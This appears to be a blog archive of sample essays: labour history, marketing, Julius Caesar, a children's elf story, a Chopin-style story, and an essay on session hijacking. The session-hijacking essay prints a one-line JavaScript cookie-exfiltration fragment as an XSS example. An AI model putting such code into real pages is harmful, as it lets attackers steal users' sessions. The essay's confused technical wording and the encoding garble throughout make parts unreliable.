Thursday, October 31, 2019
How the life and personal qualities of Harry Bridges can inspire us to Scholarship Essay
How the life and personal qualities of Harry Bridges can inspire us to achieve our goals today - Scholarship Essay Example After completing school, Bridges declined to enter his father’s real estate business, choosing to be a merchant seaman at 16. In 1920, Bridges entered the USA, and became a longshoreman at San Francisco in 1922. Bridges protested against the stranglehold of the ship owners through the company-controlled Longshoremens Association of San Francisco and the Bay Region (the Blue Book Union). Speedups, arbitrary dismissals, blacklisting of militant workers, low wages, long hours and dangerous working conditions were endemic on the docks. Bridges earned support among the longshoremen for the revival of the local of the International Longshoremen’s Association, advocating "Organization...rank and file control... unity of action... union democracy... solidarity among all Coast ports... among all unions,†(ILWU website). The local ILA was formed in 1933. Despite pressure from the Roosevelt administration, theories of a communist conspiracy and media opposition, the 1934 Wes t Coast Longshore Strike began on May 9, with Bridges as the chairman of the Strike Committee. Bridges formed a coalition of all waterfront workers and effectively stopped shipping on the West Coast. On July 5, "Bloody Thursday," the police charged the workers picket lines, shooting into the ranks of unarmed men, and wounded over one hundred men. Two men were killed. This led to a general strike and finally, arbitration commenced, with the unions successfully negotiating joint hiring-halls, a thirty hour week, higher wages, union recognition and coast-wide contracts. In 1937, Bridges founded the ILWU, serving as President for 40 years. Bridges life was characterized by a shining integrity which one cannot fail to admire. He remained steadfast in his loyalty to his fellow-workers, insisting that the salary of all union officials be the same as that of a longshoreman’s wages. His tactics are a shining example of the adage ‘United we stand,
Tuesday, October 29, 2019
Critique Assignment Example | Topics and Well Written Essays - 500 words - 1
Critique - Assignment Example The authors have discussed various approaches the organizations will use modern knowledge to capitalize on customer involvement and transform brand conversation expertise and populations. Therefore, as the marketing world undergoes digital transformations the most essential tools for marketers will be maximizing on forming relationships with the customers and delivery of value to them by taking customers are the central nerve of the marketers’ activities. These perceptions are echoed by Wong in the article â€Å"The Future of Advertising.†Wong makes a similar observation and argues that marketers’ competitiveness will be determined by their ability to identify customer’s specific needs and to satisfy that requirement in real time (Wong, 2015). Also, he argues that the era of mass-marketing products is coming to an end because although televisions and radios assist in reaching many audiences they are not sufficient for consumer engagement. On the contrary, marketers will use strategies to identify the exact needs of the consumer momentarily and satisfy that need in real time. Wong cites an example of Google and Apple use of mobile applications to control human health, cars and homes as a mark of the beginning of the digital era that leads instantaneous satisfaction consumer needs (Wong, 2015). Therefore, marketers will use various applications and devices to interact with consumers and deliver their value through the devices and applications The book and the article presents the clear truth about the future marketing by arguing that the marketers should understand the specific needs and wants of the customers, focus on particular market segment which they can be able to satisfy and maximize on value creation to appeal to the customers and develop value for them (Kottler & Armstrong, 2015). Through such marketing practices, the organizations can enlarge
Sunday, October 27, 2019
Study And Analysis On Session Hijacking Computer Science Essay
Study And Analysis On Session Hijacking Computer Science Essay Generally the most common way of tracking a user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out. Introduction: Session hijacking term means the exploitation of presently running session. Sometimes it is often referred as session key, it is used to gain the unauthorized gain to a system or to exploit services in the a computer. When a magic cookie which is used to authenticate the user to the server is stolen and used for the unauthorized purse is referred as session hijacking. Generally it is relevant to the web developers, as HTTP cookies are used to maintain the session on a site can be easily stolen by an attacker or the attacker can utilize by gaining access to the computer where the he can find the saved cookies. Cookie: When the user runs a machine, the machine stores a small text file which is called as a cookie. Cookies are plain text, they do not contain any executable codes A web page or sever instructs a particular browser to store the information and sent it back whenever there is a request based on certain rules. Majority of sites identifies the users by these cookies. A user login state is done by using a cookie. The process is quite simple, go to a page and enter the login id and password. If the information provided is correct, the next response is in the form of a cookie which uniquely identifies a particular user. In order to check the login credentials, cookie is checked for each page of the site and it verifies your originality by being intact, until you log out. Session hijacking in TCP In the session hijacking in TCP, the attacker takes over the TCP session between the two computers. As the most of the authentication is done at the starting of the session, this allows the hacker to gain over the machines. One of the common methods used is source- routed of IP packets. It is generally middle in the middle kind of a attack, where a hacker a point B intercepts the conversation between the A and C by encouraging the packets to pass through the attackers machine. Even though the source routing is turned off, the attacker can use a method called blind hijacking, where the attacker tries to guess the response between the two machines. If he is successful, then the hacker sends a command but he can never see the response but however a common command is like password, which allows to access from some other place on the network. One of the purposes of such an attack is to cause the denial of service attack at one end point so that it will not respond. This attack can force the machine to crash or it can force the network connection for heavy packet loss. Problem: The main problem with this kind of a system is that it leaves the user identification at a single data point and more over the cookies sent over the internet is in the form of plain text, which makes it to highly vulnerable to packet sniffing, where hacker intercepts the conversation between the network and the computer. One the user login cookie is stolen; it can be used to run the similar session at a distinct place by manually setting the cookie. Because the server canà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢t differentiate between a original cookie and a duplicated cookie which was modified by the attacker through the packet sniffing, so it shows as if the user is logged on. This type of attack is generally referred as session hijacking. To prevent session hijacking using cookies there are few methods. The first one is, sending the cookies over the SSL; this is a common method technique. SSL uses the encryption method for the request on the site before responding across the internet and cookie value cannot be solely determined by the sniffing. The banks and stores generally use this method frequently since most of the session is for short duration of time. Another method is to generate the session key randomly or which is based on the information of the user such as login id, IP address, and time when he logged in etc. It makes the session key un- usable, though it is possible. The other way is to revalidate the particular user before performing assigned to a higher security level, such as, many sites as for login information for the second time before modifying the password. Cookies in JavaScript Creating, removing and manipulation of cookies can be done in JavaScript by using document. cookie property. This property behaves as a set cookie header when it is assigned to a cookie header. While creating a cookie, string must be used in the same format. You can create, manipulate, and remove cookies in JavaScript by using the document.cookie property. This property acts as the Set-Cookie header when assigned to and as the Cookie header when read from. When creating a cookie, you must use a string thatà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢s in the same format that Set-Cookie expects: document.cookie=name=prahald;; path=/; just by modifying the values of document.cookie does not delete the cookie. It just either creates or modifies the particular string. So that whenever the next request is made to the server, these cookies are sent along the set cookie. To retrieve cookie values in JavaScript, just read from the document.cookie property. The returned string is in the same format as the Cookie header value, so multiple cookies are separated by a semicolon and space. Example: name1=Munn; name2=prahalad This is the reason why, we need to compulsory make a cookie string manually as an original cookie Cookie stealing and XSS To able to load JavaScript from a distinct domain onto a page opens up at a particular week point or security loop holes. In fact a request from a third party, the JavaScript doesnà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢t include the cookies containing in a page. The JavaScript can get access to all of them. All the script page are considered as, running on a common platform. With the similar path, and by using the similar protocol as the page. This means a script form loaded in other domain page by reading the cookie as cookie. Document. For example, it can be dangerous , if a person lodes a script from which consists of some useful codes. However, users at can switch that code to the following: (new Image()).src = + cookie.domain; As this code is being loaded on to the user page, without being recognized by user send users cookie to the This problem happens to each and every person who visits the site. Once the hacker has the user cookie, it is very easy to penetrate and doing other attacks including the session hijacking. Whenever attack happens due to injection of third-party JavaScript into a page, it is referred as cross-site scripting attack or it is generally referred as XSS. Cookie theft doesà ¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒ ¢Ã¢â‚¬Å¾Ã‚ ¢nt occur by just injecting a malicious scrip onto your page accidentally, it can also happen due to poor input filtering. Such as a page, where the user can enter the text, which is the output, onto the page. If the text consists of a script tag with the similar code as mentioned above then it is possible to steal the cookies The cross site scripting attack has been used against large sites for example, live journal and MySpace. The best way to protect is of forms: Never ever include the JavaScript for sites or domains which are untrusted. The CDNs of big companies like yahoo,AOL and Google should be more secure; using best precaution which includes other locations. From all the user input the HTML should be filtered out. You should not accept any user input and outbound onto a page without filtering it. Conclusion Hence it is safe to use cookies which all the security issues around them. That is why HTTP cookies are considered as important over the standard cookies implementations. If a cookie is marked as HTTP, a attacker cannot inject or get access to the malicious script by cookie via document. So it becomes difficult to steal the cookies. When such a HTTP cookies are supported by the browsers it becomes a third option.
Friday, October 25, 2019
The Role of Minor Conspirators in Shakespeares Julius Caesar :: Julius Caesar Essays
The Role of Minor Conspirators in Shakespeare's Julius Caesar    In William Shakespeare's Julius Caesar the supporting role of the minor conspirators has a great impact on the major conspirators. Just as women often embolden powerful men of society, the minor conspirators embolden the major conspirators, greatly affecting the outcome of the play.       One of the most important minor conspirators of the play is Decius, who was responsible for bringing Caesar to the capitol on the day of the assassination. The entire conspiracy almost failed because on the night before the assassination was to be carried out, during the storm, Caesar's wife Calpurnia had a dream about Caesar being killed, and she had convinced him to remain home the next day. When Decius arrived at Caesar's home in the morning to take him to the capitol he realized that he must convince Caesar that he had misinterpreted his wife's dream so Caesar would go as planned. Decius needed to make Caesar realize that his wife, the soothsayer, and all of the omens were purely coincidental which he did by interpreting Calpurnia's dream with a double meaning, "Your statue spouting blood in many pipes, in which so many smiling Romans bathed, signifies that from you great Rome shall suck reviving blood, and that great men shall press for tinctures, stains, relics, and cognizance." (JC. II. ii. 85-90). Decius successfully executed his role in the conspiracy which led to the assassination of Caesar.       Another very influential minor conspirator was Cinna, who aided in persuading Brutus to join the conspiracy. Getting Brutus involved in the conspiracy was crucial because of his close relationship with Caesar and his prominence with both the senators and the common people. Cinna was assigned, by Cassius, the task of delivering a flattering letter to Brutus to which he responded, "Well, I will hie, and so bestow theses papers as you bade me" (JC. I. iii. 150-151). Cassius and the rest of the conspirators realized how beneficial Brutus would be to their conspiracy, so when Cinna played a large role in getting him involved, the plot was greatly influenced.       The third minor conspirator who significantly influenced the course of the play was Casca. Casca was the first person that told the rest of
Thursday, October 24, 2019
Kirby the Elf Kid Story
Once upon a time there was an elf named Kirby. He was one of Santas elfs. But, he was there only to help with the reindeer, when what he really wanted to do was to work on a toy line. It wasn’t like he didn’t love the reindeer, he just really wanted to make children smile and happy. All of the other elfs that worked with the reindeers laughed at him because if u were to work on the toy live you had to work with Santa for a very long time, that certain job was meant for elfs that he absolutly trusted.Sadly, Kirby had just started working with Santa and he has never even talked to Santa, which was part of the problem. One day Santa had gotten a phone call and he had a distraught look on his face. He hung up the phone and said â€Å"Oh no, Tanner, Joey, and Jocy had gotten into a snowboarding accident, that was the hospital. They wont be back to work for 2 weeks and christmas in 5 days! †Now see these elfs weren’t just any elves, they the fastest , strongest , and Santa’s favorite elves. And, even though Santa would say he didn’t like to pick favorites everyone knew he did.The other evles would have to wear red and green, where as Joey, Tanner, and Jocy had gold and white outfits. Santa really needed Jocy, Joey and Tanner because about two hundred children that had been on the naughty list had good and deserved to get toys instead of just coal. So the other elves had to work very hard to make more toys but it wasn’t enough. Santa went to the stables and said â€Å"Hello Kirby, Andy, Nik, Kira, Devon, and Chelsey I am in some trouble and need to pull you guys from reindeer duty to help make some toys. †Chelsey said â€Å"But Santa, we have never made toys before what if we let you down? Santa said â€Å"Oh you guys could never let me down, all that matters is that you try as best as you can. †Kirby was so excited. It was his time to shine. Thankfully when you start the job the head elves teach other elves how to work all of the machines just in case this sort of thing happens. So all the elves knew how to work the machinary but they never really knew how toys were supposed to work because they’re nevere around them. They basically had to wing it. The other elves didn’t really like the idea of having Kirby and his friends working in the toy line, especially one elf named Ryan.Ryan was a really bitter mean elf. He only got along with Jocy, Joey, and Tanner, and he didn’t like the fact that they were being replaced. In his mind he thought â€Å"I have to do something to get rid of these other elves†¦they don’t belong here! †He devised a plan in his head of a way to get rid of Kirby and his little friends. While Kirby and his friends were waiting to start there first doy on the toy line Ryan had locked them in the lunch room. â€Å"This will keep them out of my toyline. †He said with a snicker. But, Ryan had forgotten that there was a an exit to outside of the toy factory.When Kirby and his friends had noticed that the door was locked they had to hurry and run around to the other side of the building and went through the back doors. Kirby was determined not to let Santa down. He really wants to prove himself to him to show that he doesn’t belong in the stables with the reindeer. They finally made it to the toy line and they were on time. Ryan looked at them with irritation as Kirby and his friends had walked over to their stations. The bells rang and the machines started running. Kirby was so excited all he could do was smile.Kirby was at the station where they wrapped all the gifts and delivered the presents to Santa’s sleigh. Andy had they toy station full of cars, Nik had the station with the coloring books and books, Kira had the station with the board games,Devon was at the station with the stuffed animals and Chelsey was at the station where they had to make the toys that were trains and an y other toys that had batteries. Ryan was in the same station with Kirby and was going way to fast trying to get kirby to screw up or make a mistake.But Kirby kept and eventually go the hang of it. Ryan was getting even more frustraited with the fact that he couldn’t get rid of Kirby, he didn’t even want to admit the fact that Kirby actually belonged there. Ryan kept plotting and plotting till finally he got an opening to sabotage. Kirby was carrying a lot of presents and didn’t know which way it was to Santa’s sleigh. Ryan ran to him and said â€Å"OH OH I know where to go let me show you†as he had an evil smirk on his face he lead Kirby into a room that was used for the christmas parties.He said keep walking forward and started walking backwards and slammed the door shut and locked him in there and laughed. Kirby said â€Å"why are you doing this? What about the children? †Ryan said â€Å"Because you don’t belong here, I don†™t like change! Now you will never work in the toyline EVER!! †Ryan left and Kirby started to panic and worry. Kirby still had an hour to get the toys to Santa in time to make the delivery. Lucky for him his friends had noticed he had been gone for 30 minutes and Ryan had returned and Kirby wasn’t with him. So they all split up and went searching for him.Finally, Nik was yelling Kirby’s name and Kirby started banging on the door â€Å"Nik, I’m in here, get me out please! †Kirby said. Nik let him out and Kirby said â€Å"which way is Santa’s sleigh? †Nik said â€Å"I know where it is follow me! †They both ran like mad men to Santa’s sleigh with only 5 minutes to spare. Santa said â€Å" oh thank you so much I could’ve never gotten this done without you, but what took you so long my elves? †Kirby pointed at Ryan as he ran up to see if he had succeeded or failed, â€Å"Santa he locked me in a dark room and wouldn’t let me out!Ryan tried to defend himself â€Å"Santa, its true I just don’t want him to replace Tanner, Joey, and Jocy. †Santa said â€Å"Oh Ryan. Kirby would never replace them I love all of my elves equally. As for you Kirby you did a fantastic job and should be rewarded, and Ryan should be punished, therefore you both will trade places, sorry Ryan you will now work in the stables with the reindeer. †Kirby was so happy! His dream finally came true. He now is working on the toy line woth three of the greatest elves that work there. He has never been so thankful.
Wednesday, October 23, 2019
The Story of the Next Hour
It was Richards who had conversed with the doctors and, in veiled hints that revealed in half concealing, informed the others as to the heartbreaking truth of the tragedy. It was he too who dealt with the necessary arrangements for the body whilst the remainder of the house was engulfed in a storm of grief. With a paralysed inability to accept its significance, Brently sunk into the depths of the roomy armchair that stood facing the open window. With his face masked by his cupped hands he remained there, screening from the view of Josephine the vast sea of tears that overwhelmed his face, lest it distressed her further. Richards feeling for the vast loss of his dear friend, put his arm about his shoulder as if to try and ease away the pain that had woven itself to him. However he was instructed by Brently of his need to be left in solitude and with that he retired from the room. Pressed down with physical exhaustion, he hauled his burden away up the stairs towards the only room in the house where Louise's presence lived on as strong as ever. On seeing this, Josephine also took to her feet and fled from the house with a sudden wild abandonment after being caught up in the event of the last two hours. Louise had once been an elixir of life to Brently. He had lived for her and had idolised her every move with admiration. As he passed her body on his way to their room, his sanctuary, he was struck dumb with how life like her delicate body looked. Her cheeks still bloomed as they had done the day she had agreed to marry him, blushing with the same tint of cherry just as when white lilies are crowded with roses and take on their red. Her eyes too, such deep green, as green as all the oceans of Neptune, still bore her soul and it opened the door to his heart and melted it. As he reached the door of the bedroom he and Louise had shared together for what seemed only a few moments in the vastness of eternity, he was reminded of her sweet nature by the delicious breath of her sweet perfume that lingered in the air and as he passed across the room he was sure he heard her voice somewhere in the distance proclaiming the love she felt. There stood, facing the open window, he reminisced on times forgone, his face, whose lines now bespoke repression, wet with tears. And as he gazed out of the window upon the world carrying on around him he could see the leaves falling from the trees, amber, brown, gold, signifying the end of one chapter and the beginning of a new. Just at that moment a faint tapping was heard at the door and Brently heard Josephine imploring for admission. â€Å"Brently, Richards will go with Louise if you wish. Its time to say your farewells†Traversing the staircase down to the open door Brently collected himself. It was only yesterday that he had felt like Louise and him were falling apart and had begun to detach the bond they once had shared. He then thought to the future for the first time since the incident and with a shock revelation and the realisation that he was now free to venture forward on whatever path he so did choose, he composed himself for his life to come. Peering out of the doorway, Brently now became conscious of the reality that stood before him; this would be the final opportunity to gaze upon his wife. Having been hit by this sudden awareness of the situation, his sight became focused towards the horse drawn cart preparing to draw away. Within a moment however, overcome with grief at this pivotal point in his life, he remained content with sharing in her presence alone and was left with a less desirous wish to fix his eyes upon her fragile body lest the pain be overbearing. To see her lying there, motionless and with her lifeblood drained from within would have been too shattering and the thought of letting her go too unbearable for contemplation. Having collected himself once more for the events, which were to follow, with a word of thanks to Richards for his assistance in the affairs of the day, he embraced the companion whom he valued so dearly, the companion who had relieved the ache that was trapped within his heart. â€Å"Take care of her for me††I would do nothing less†With this Richards picked up his gripsack and boarded the cart. Silence surrounded them as the cart pulled away and grief tortured those who would carry the burden around with them forever, but within the cart Richards and Louise rejoiced in the happiness that lay before them and with minimal thought for the grief they had left behind they turned the corner, both in the road and in the winding passage of life.
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